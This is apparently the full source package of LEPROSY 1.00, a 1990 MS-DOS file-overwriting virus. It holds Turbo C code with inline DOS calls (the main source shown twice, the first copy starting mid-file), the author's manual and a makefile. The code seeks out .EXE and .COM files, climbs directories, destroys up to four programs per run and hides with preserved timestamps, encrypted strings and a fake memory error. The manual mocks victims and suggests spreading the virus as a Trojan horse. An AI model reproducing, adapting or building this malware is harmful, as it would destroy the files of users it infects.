const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */


/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );



/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}


void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}


int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}



int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}


void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}


void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}


int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}


int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}


void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}


void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}





L E P R O S Y 1 . 0 0

A Virus for MS-DOS Systems.
Copy-ya-right (c) June 29, 1990 by PCM2




GENERAL SUMMARY
~~~~~~~~~~~~~~~

LEPROSY is a virus which can influence PC and PC clone
systems running MS-DOS or PC-DOS version 2.0 or later. It may
be characterized as an overwriting, non-resident .COM and .EXE
infecting virus, similar in operation to the AIDS Virus by
Doctor Dissector and CPI; in fact, the AIDS Virus was actually
the inspiration for this program, though Leprosy is in no way a
re-write or mod of the AIDS Virus, it is an entirely new
program.

The way both Leprosy and the AIDS Virus (and Number One,
the ancestor of AIDS) work is fairly simple. Upon executing the
virus program, the virus runs a search for executable files
which it can affect. It does this by doing a general scan for
all files with a .COM or .EXE extension, then, having found such
a file, it loads in part of that file's code to compare it with
the virus' own code, to make sure the file found hasn't already
been infected. If it hasn't, the virus proceeds to write itself
OVER the code of the executable file found. The executable file
now ceases to perform its original function. When the
unsuspecing user runs the file, he will instead be running
another copy of the virus, which will seek out another
executable file to infect, and so on. The executable files
which are infected by the virus in this manner are permanently
destroyed. While this is a primitive way to spread a virus, it
is actually pretty effective, if you consider that by the time
the user discovers a file which has been infected by the virus,
it has already gone and zapped one or more other files, and by
the time the user finds those files, they will have infected a
few more, and on until the user figures out some way to detect
and eradicate all the infected files.

While Leprosy is similar in operation to the AIDS Virus, it
presents several important advantages over AIDS:

1. CARRIERS: The AIDS Virus will only infect .COM files.
Leprosy is not limited in this way; it will infect both .COM
files and the more common .EXE files, going for .EXE files first.

2. FILE SIZE: The AIDS Virus is written in Pascal, and is about
13K in size. Considering that any file that is infected which
was originally smaller than the virus itself will expand to the


- 1 -





size of the virus when it is infected, and that many .COM files
will be smaller than 13K, quite often a file will show a
noticeable change in size when infected by the AIDS Virus.
Leprosy is only a mere 666 bytes in size; therefore, changes in
file size will be much less frequent, and the disk access time
it takes to infect a new file will be considerably shorter than
when using the AIDS Virus.

3. DUMBSHIT FACTOR: When the AIDS Virus infects a file or fails
to find any non-infected files, it just sits there or hangs up
the system. Leprosy takes a more subtle approach, however.
When Leprosy has infected some files successfully, it prints out
the message "Program too big to fit in memory". This way,
dumbshits might think there is something screwy with their RAMs
or TSRs, and may end up running the same virus-infected file one
or more times before they get a clue.

4. CONCEALMENT: To find out if a file has been infected by the
AIDS Virus, all you need to do is run a hex editor on the file
and look for the full screen reading "AIDS" in the code. Once
again, Leprosy makes it more difficult on the dumbshit user.
All the strings Leprosy outputs to the screen are encrypted in a
simple way, enough to make it impossible to quickly spot
suspicious phrases when running a hex editor on an infected
file. What is more, Leprosy will not change the time/date stamp
on the file when it infects it, unlike AIDS.

5. COMMUNICABILITY: When the AIDS Virus fails to locate any
non-infected .COM file in the current directory, it can no
longer spread itself. The only way an AIDS Virus can spread
from one directory to another is to somehow make it into one of
the directories in the current PATH, and be called by the user
from a different directory. Leprosy gives itself one more
shot. When it fails to find any more non-infected files in the
current directory, it will step back into the parent directory,
and try to find some files again there. While when the virus
exits the current directory will have changed when Leprosy does
this, hopefully the dumbshit won't catch on. The payback is
that Leprosy might eventually creep up to the root directory and
infect COMMAND.COM, and then the user will be fucked over.

6. RATE OF TRANSMISSION: The AIDS Virus will only infect one
file at a time. Leprosy will infect up to four files each time
it is run.

SETTING UP LEPROSY ON A SYSTEM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To install Leprosy onto an un-infected system, all you need
do is run the provided file, LEPROSY.COM, somewhere on that
system, preferably somewhere where it will have access to a lot
of commonly used executables. Alternately, you could infect
some program with an impressive-looking file length and

- 2 -





documentation and send it to someone as a Trojan Horse type
program. Just make sure it gets run.

COMPILING LEPROSY
~~~~~~~~~~~~~~~~~

To assemble the Leprosy .COM file, you will need Turbo C
2.0 and Turbo Assembler. MASM might work, just as long as the
executable file turns out the appropriate length. If the .COM
file doesn't come out to exactly 666 bytes long, then it might
not work properly. C compilers other than Turbo C will probably
not work, since the program makes extensive use of inline
assembler, but versions other than 2.0 will probably be okay.
Just remember -- watch the file length.

The easiest way to re-create Leprosy is to just run MAKE,
and the provided makefile will handle the rest. If you are
compiling it by hand, you should use this makefile as your
guidelines. An important note is that you should not link the
program with the standard Turbo C startup code for the Tiny
memory model; instead, always link it with the provided
alternate startup code. This file, C0T.ASM, is a startup
sequence which gets rid of code to gather command line arguments
and the like, allowing for programs which are essentially as
small as their assembly language counterparts. Just remember,
keep an eye on the executable file size.

WAYS TO SPOT THE VIRUS
~~~~~~~~~~~~~~~~~~~~~~

There are several ways to notice the Leprosy virus on your
system. If small .COM files are increasing in length to 666
bytes, that's your first hint. 666 bytes isn't a very likely
file length, but it's funny, so I'm keeping it that way. Also,
if the current directory changes when you run a program, or you
notice strange "Program too big to fit in memory" errors, that
should tip you off too. Leprosy can also be detected by CRC
checking programs, because it directly modifies the contents of
the files it infects. What is more, Leprosy causes a
distinctive drive noise, sort of a "blickablickablickablicka" on
my hard drive, because it is opening, reading from, writing to,
and closing a number of files very quickly.

ACKNOWLEDGEMENTS
~~~~~~~~~~~~~~~~

I'd like to thank some of the pirate boards in the (415)
area code -- they know who they are.

What is more, I'd like to say that I used the December 26,
1989 issue of PC Magazine, and the book "The NEW Peter Norton
Programmer's Guide to the IBM PC and PS/2" in the process of


- 3 -





writing the Leprosy program. I just thought I'd mention that,
since it kind of makes me laugh to wonder what Peter Norton and
PC Magazine would think if they knew they were partly
responsible for the creation of a virus. HAHA!

Yours truly,
PCM2



P.S. BTW, if Leprosy fails to find any .EXE or .COM files that
aren't infected, but it locates more than 6 executable
files that are already infected with Leprosy, it displays a
message indicating that the system has been infected with
Leprosy, and wishes the user luck. If it can't find any
new files to infect, and only finds 6 or less infected
files during its entire run, it just prints out the fake
"Program too big to fit in memory" message again.
































- 4 -

/* This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/


#pragma inline

#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */


/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};



struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */


const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */

char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */


/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );



/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/

int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}


void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}


int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}



int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}


void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}


void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}


int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}


int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}


void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}


void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
# makefile for LEPROSY Virus 1.00 by PCM2

leprosy.com: leprosy.obj c0t.obj
tlink /x /t c0t+leprosy,leprosy,,

c0t.obj: c0t.asm
tasm c0t

leprosy.obj: leprosy.asm
tasm leprosy

leprosy.asm: leprosy.c
tcc -mt -f- -K -S leprosy